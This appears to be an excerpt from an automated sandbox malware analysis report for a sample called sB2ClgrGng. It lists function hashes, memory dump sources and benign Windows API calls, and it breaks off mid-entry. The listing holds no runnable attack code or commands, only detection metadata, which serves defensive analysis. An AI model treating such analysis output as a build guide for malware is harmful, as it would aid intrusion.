                                                                                                                                                                                                                                • Instruction ID: 2710006531fa8108a76e28835aed707d1f4ee66020afd97c189d14e8a4287bf8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9309f1701a42d567f2b256d78ef444061abe5330f80f315c89d8de48205de333
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5A17A23F0864286F7A09B25D460BBA2395EF40B44F594635DA3D866DECFBDF8818781
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3251591375-0
                                                                                                                                                                                                                                • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                • Instruction ID: 20406683c3d03415e07bcf6f084e28491c8a870ba451ed3030105021b52fbf39
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF311821F0C5468DFA54BB659CF32B91A81AFA1784F449035EE0EC72DFDE6DE844D211
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                • Instruction ID: db6755850ae78ef7e38998cba850e33e3dd2e148651b14ab5a6fe3f820f7c41a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D51F731B0D6418EF724BE69948267A6291AF86BB4F1A4634DD6D837CDCF3CE4019720
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                                • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                • Instruction ID: e2861e93b0de3ffbced3346885e5fece54c8e8843f6073b18273fff152138241
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C311042660CA8185DA20BB25A885169B361BB91FF0F540331EE7D87BDCCF3CD0148700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A95E
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A968
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                                • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                • Instruction ID: f5ddc91adfb0ba349af405d72a9fbff26ad0d6a50a078a344d395667dc2e0fad
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92E08C21F0D6428AFF1ABBF2A8C713812916FC8B00F440034DC1DC22AAEE2CE8828310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00007FF64488A9D5,?,?,00000000,00007FF64488AA8A), ref: 00007FF64488ABC6
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF64488A9D5,?,?,00000000,00007FF64488AA8A), ref: 00007FF64488ABD0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                                                                • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                • Instruction ID: 59b189c65cfb96843706c69760e74eb70b7cee45c1406d55c645a375db9775ae
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65219611F1CA8249FA94B75194D637922929FC4BA0F084239DE2EC77DDDF6CE4418300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                • Instruction ID: 0b893ed7ea0b77047f18fba12e5c3f55551b9bbfb53913e418721c776a8da696
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2841A43291C6458BEA24BB19E58227973A0EFD5780F140131EF8EC76DACF6CE402CB51
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _fread_nolock
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 840049012-0
                                                                                                                                                                                                                                • Opcode ID: e1315d2f6f00395e8c4775e010b327fe7281e2fae45ce4cd0a11699a80637139
                                                                                                                                                                                                                                • Instruction ID: b180facd7e6e6c62b153ad200c8d47848d85e16c0edc9d3332a0e331b2c62582
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1315d2f6f00395e8c4775e010b327fe7281e2fae45ce4cd0a11699a80637139
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D21C721B1CA564EFE50BB226D963BA9651BF45BC4F8C4430EE0D9778ADE7DE441C310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                • Instruction ID: f792a154c4f0c818ab992283cc149fc0daed787d2a1d52ccbdc0b672c7175d02
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05313C22A1C65289E652BB55888337C2A90AFC0BA4F911135ED5D873DBEF7CE8858721
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                • Instruction ID: 96bb4147fc3beb661b4045480d50cd633d694023333b54d5cc802c631a456edf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0117232E1C6828AEA60BF11948227DA2A4BF85B84F444435EF8CD7ADFDF3DE5008710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                • Instruction ID: d0ee589d1281d71e3a34cff6dd1bc709d7b0c5895c603c0e8665e6d90be33361
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D215032A1CE418ADB61BF18D48237977A0BB84B94F544238EE5E976DDDF3DD4118B00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                • Instruction ID: 1f3d8853ab592a710b04ff31ada186bb604cd8e8fe0a49fecf4c74ac41599cfc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E01C461A4C74684EA04FF529982079A691BF86FE4F494631EE5C93BDFCF3CE4018310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644879390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6448745F4,00000000,00007FF644871985), ref: 00007FF6448793C9
                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00007FF644876476,?,00007FF64487336E), ref: 00007FF644878EA2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2592636585-0
                                                                                                                                                                                                                                • Opcode ID: 11a4aaaef8a7a10f6e0ce37232ac144c9e9b59754371ad75d1a790c2d21c933d
                                                                                                                                                                                                                                • Instruction ID: 67019d0a427582bbabe4f5d9f2cc0d5eb1b92673759a972287699f474bbe11de
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11a4aaaef8a7a10f6e0ce37232ac144c9e9b59754371ad75d1a790c2d21c933d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56D08C11B2864646EA44B76BBA876295251AF89FC0F889035EE0D47B5EEC3CD0514B00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2198558047.00007FFDFF191000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198504238.00007FFDFF190000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF212000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF23C000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF247000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF252000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198911802.00007FFDFF256000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198959360.00007FFDFF258000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdff190000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                                                • Opcode ID: 30f5a756a2453722bd5fc7c60f00636787785f570310c9cdf96fb774af82a049
                                                                                                                                                                                                                                • Instruction ID: 4dbf44e84b5c8952eeaad61a49263575df89162f7ef362121bb023ae0a6a079c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30f5a756a2453722bd5fc7c60f00636787785f570310c9cdf96fb774af82a049
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38317E33F0824289F7A49F259460A7E6391EF80B44F194635DA39466CDCF79F8918B80
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2198558047.00007FFDFF191000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198504238.00007FFDFF190000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF212000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF23C000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF247000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198558047.00007FFDFF252000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198911802.00007FFDFF256000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2198959360.00007FFDFF258000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdff190000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                                                • Opcode ID: d29a44c3b10b43c9c66d24f2e9978454315fcbd019f87c95ebe5899c13090e1b
                                                                                                                                                                                                                                • Instruction ID: 45611ab87021c74dd8fded0c7fc7e120a26a797983b0611733f8ce3e2515785e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d29a44c3b10b43c9c66d24f2e9978454315fcbd019f87c95ebe5899c13090e1b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D221A133B0878087E3649F22E59066EB3A5FB88B94F544225EBA843F99CF3CD155CB40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF644880C90,?,?,?,00007FF6448822FA,?,?,?,?,?,00007FF644883AE9), ref: 00007FF64488D63A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                • Instruction ID: 0ce46b99c2161101720227423c37da436508429bcf98fc69ee809bc8fab3f170
